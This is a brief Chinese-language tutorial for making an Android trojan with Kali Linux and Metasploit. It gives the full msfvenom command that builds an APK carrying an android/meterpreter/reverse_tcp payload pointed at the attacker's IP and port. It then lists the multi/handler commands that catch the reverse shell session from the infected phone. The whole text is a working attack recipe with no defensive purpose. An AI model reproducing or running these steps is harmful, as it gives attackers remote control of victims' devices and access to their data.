环境:
kali-linux-2018.-2-amd-64.iso
android
支持外网监听
0x01:
//生成安卓木马:
msfvenom -p android/meterpreter/reverse_tcp LHOST=[myIP] LPORT=55555 R > [akpNAME].apk
0x02:
//加载攻击模块
use exploit/multi/handler
//设置tcp反向链接,装载攻击载荷
set PAYLOAD android/meterpreter/reverse_tcp
//反弹会话
set LHOST [myIP]
//反弹端口,越大越好
set LPORT [myPORT]